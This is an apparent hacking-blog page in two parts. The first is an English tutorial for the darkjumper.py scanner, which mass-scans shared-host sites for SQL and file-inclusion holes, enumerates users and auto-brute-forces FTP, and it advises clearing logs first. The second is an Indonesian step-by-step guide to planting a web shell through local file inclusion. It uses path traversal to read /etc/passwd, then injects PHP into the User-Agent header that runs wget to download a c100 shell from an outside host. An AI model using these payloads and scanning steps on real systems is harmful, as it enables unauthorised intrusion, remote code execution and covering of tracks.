break a time, with break the c0de…

hacking

DARKJUMPER V5.3 WAS RELEASE AND TUTORIAL BY GUNSLINGER_


well after darkjumper v4.0 was rock up by my big brother , mywisdom .
now i’m and mywisdom developed darkjumper v5.0 (now v5.3) and added more function in darkjumper
with this, i released this tools and some tutorial how to using this tools and what’s new in this version…

Toolname     : darkjumper.py v5.3
Developed by : mywisdom & gunslinger_ <devilzc0de.com c0der>
Released on  : 15 ,February 2010
Download url : https://sourceforge.net/projects/darkjumper/

Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
4. Portscanning
5. Autobruteforcing after user enumeration
6. Autoinjector - autocolumnfinder (mysql) if found mysql bug if found
7. Proxy added
8. Verbocity added
9. IP or proxy checker and GeoIP usefull for checking your IP or your proxy work or not

Additional feature: more fake http user agent(s)
Requirement(s): - python : 2.5.x
		- perl

Now we’re go to tutorial section :

before scanning : make sure you always clearlog before scanning by execute clearlog.py

./clearlog.py

allright folks , now we’re ready to try execute darkjumper and show the option by

./darkjumper.py -h

or

./darkjumper.py --help

and we got like this…

in this version, we have 6 mode. there is :
reverseonly				| Only reverse target no checking bug
surface					| Checking for sqli and blind sqli on every web that host at the same target server
full					| Checking for sqli,blind,rfi,lfi on every web that host at the same target server
cgidirs					| Scanning cgidirs on the target server
enum [number] 				| Guessing possible user enumeration on server (4-8 chars user enumeration)
portscan [startport]-[endport]		| Scanning open port on server target

ok there is any full description on it…

– reverseonly
in this mode, darkjumper only reverse target ip. no checking any bug .
Command is :

./darkjumper.py -t [target] -m reverseonly

Example :

– surface
This mode, darkjumper reverse the target then check sqli (sql injection vulnerability) and blind (blind sql injection vulnerability) on every web that host at the same target server
Good is in this version and up, we’re also trying to finder the column automatic if we got mysql type error ! phew !
Command is :

./darkjumper.py -t [target] -m surface

example :

– full
This mode, darkjumper will reverse target then check CGI path and checking sqli (sql injection vulnerability) , blind (blind sql injection vulnerability) , lfi (local file inclusion) , rfi (remote file inclusion) on every web that host at the same target server . autoinjector or autocolumn finder working to in this mode if we got mysql error.
Command is :

./darkjumper.py -t [target] -m full

Example :

– cgidirs
This mode, darkjumper only checking CGI path checking on your target

Command is :

./darkjumper.py -t [target] -m cgidirs

Example :

– enum
This mode, darkjumper reverse the target then Guessing possible user enumeration on server (4-8 chars user enumeration)

Command is :

./darkjumper.py -t [target] -m enum [number]

Example command :

./darkjumper.py -t [target] -m enum 4

Example :

Note : You can enable autoftpbruteforcing by :

./darkjumper.py -t [target] -m enum [number] -a 

(argument -a is for autoftpbruteforcing)

Example :

– portscan
This mode, darkjumper only checking open port on your target
Command is :

./darkjumper.py -t [target] -m portscan [startport]-[endport]

Example command :

./darkjumper.py -t localhost -m portscan 15-22

Example :

You can make it verbose by :

./darkjumper.py -t localhost -m portscan 15-22 -v

Example :

And you can check your ip and your proxy .
if you wanna check your proxy your command is

./darkjumper.py -p [proxyaddress:port]

or you wanna check your own ip address

./darkjumper.py -c 

You want stop your scanning? simply type this command
killall -9 /usr/bin/python & killall -9 /usr/bin/perl

allright guys that’s it ! hopely you can enjoy !!
Don’t forget to check latest version or report bug @ https://sourceforge.net/projects/darkjumper/

Advertisements

comming soon !! darkjumper.py v5.0


comming soon !! darkjumper.py v5.0 just wait and see baby !!

################################################################
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################
Darkjumper.py version 5.0 help module
Developed by : mywisdom  & gunslinger_
This tool will try to find every website that host at the same server at your target
Then check for every vulnerability of each website that host at the same server
Vulnerable check including: sqli,blind,lfi and rfi
-----------------------------------------------------------------------------------

Usage : ./darkjumper.py -t [target] -m [option]
	Available option :
		reverseonly
		surface
		full
		cgidirs
		enum [number] 
		     [number] is 4, 5, 6, 7, 8 in range
		portscan [startport]-[endport]

Description:
- reverseonly
	Only reverse target no checking bug
- surface
	Reverse target, then checking for sqli and blind sqli on every web that host at the same server
- full
	Reverse target, then checking for sqli,blind,rfi,lfi on every web that host at the same server
	[this mode requires longer time,I dont suggest this mode for slow internet connection]
- enum
	Guessing possible user enumeration on server (4-8 chars user enumeration)
	If you don't set number this will guesssing default to 8 chars
	[this mode requires number 4 until 8 for guessing users]
- portscan
	Scanning open port on server
- cgidirs
	Scanning cgidirs on the server
----------------------
Sample Usage:
----------------------
Reverseonly mode :
	Example : ./darkjumper.py -t www.jasakom.com -m reverseonly
Surface scanning mode :
	Example : ./darkjumper.py -t www.jasakom.com -m surface
Full scanning mode:
	Example : ./darkjumper.py -t www.jasakom.com -m full
User enumeration mode :
	Example : ./darkjumper.py -t www.jasakom.com -m enum 8
		Warning ! you must set the number of chars for user enumeration
		If you want to set number of chars for user guessing,it should be 4 until 8 ! don't less or greater 
CGI directory scanning mode :
	Example : ./darkjumper.py -t www.jasakom.com -m cgidirs
Port scanning mode:
	Example : ./darkjumper.py -t www.jasakom.com -m portscan 0-80
----------------------------------------------------------
gunslinger@localhost:~/darkjumper$ 


Cara menanam shell lewat LFI (Local File Inclusion) dengan metode proc/self/environ


Cara menanam shell lewat LFI (Local File Inclusion) dengan metode proc/self/environ

Penulis : gunslinger_

dengan tutorial ini saya akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.
Ok kita langsung saja…

1. kita menemukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd

Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba…

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

atau

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://site.com/shell.php

happy hacking !